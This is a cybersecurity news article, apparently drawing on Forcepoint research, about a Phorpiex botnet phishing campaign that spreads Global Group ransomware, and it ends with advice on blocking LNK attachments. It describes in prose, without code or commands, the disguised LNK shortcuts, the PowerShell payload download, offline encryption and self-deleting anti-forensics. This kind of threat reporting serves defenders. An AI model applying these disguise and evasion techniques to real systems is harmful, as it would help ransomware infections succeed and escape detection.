The Phorpiex botnet, an established malware-as-a-service platform that has been operational for more than ten years, is making a comeback in the realm of cyber threats. Attackers are disseminating phishing emails with the misleading subject line "Your Document" as part of a recent high-volume campaign. These emails encourage recipients to click on an attachment that looks like a harmless ZIP file with a document in it.

Nevertheless, this is a well-planned trap intended to spread the Global Group ransomware, which is the offspring of the Mamona family of ransomware. Social engineering and the misuse of Windows Shortcut (LNK) files are key components of the attack vector. Attackers use double extensions, like "Document.doc.lnk," to pass off these malicious shortcuts as authentic documents. Unaware users think they are opening a typical Word document because Windows frequently conceals file extensions by default.

The shortcut drastically lowers user suspicion and raises the possibility of a successful infection by using a standard icon from trustworthy Windows resources to further create the illusion. Chain of Attack (Source: Forcepoint) The malware was discovered by Forcepoint researchers, who also observed that the infection process is streamlined for speed and stealth. The malicious shortcut silently runs commands in the background after the victim clicks on it.

In order to download a secondary payload from a distant server, the shortcut first starts the Windows Command Processor, which then calls PowerShell. The Global Group ransomware is the payload, which is frequently named to look like a Windows driver. In order to prevent setting off conventional security alarms, the entire procedure makes use of "Living off the Land" strategies and integrated system tools.

A Quiet and Independent Danger The ability of Global Group ransomware to function in a completely "mute" mode is its most concerning feature. This type of ransomware does all of its operations locally on the compromised computer, in contrast to conventional ransomware that contacts a central command-and-control server to obtain encryption keys. It can function properly even in offline or air-gapped environments because it creates the encryption key directly on the host system.

Because it avoids network-based detection systems that search for questionable outgoing traffic, its autonomy makes it especially dangerous. PowerShell is launched by the command prompt (Source: Forcepoint). In order to hide its tracks, the malware also uses strong anti-forensic techniques. Before erasing its own binary from the disk, it uses a ping command as a timer to slightly delay execution.

The attackers make post-event investigations more difficult by deleting the original executable. In order to ensure that it can encrypt as much data as possible without any problems, the ransomware also searches for and stops processes related to databases and analysis tools. Real ransom note (Source: Forcepoint) Organizations should prioritize endpoint monitoring and block executable attachments, such as LNK files, at the email gateway in order to stay safe.

Behavior-based detection is essential to halting the encryption process before data is irreparably lost because this threat operates offline. Set ZeroOwl as a Preferred Source in Google and use X, LinkedIn, and LinkedIn to receive more real-time updates.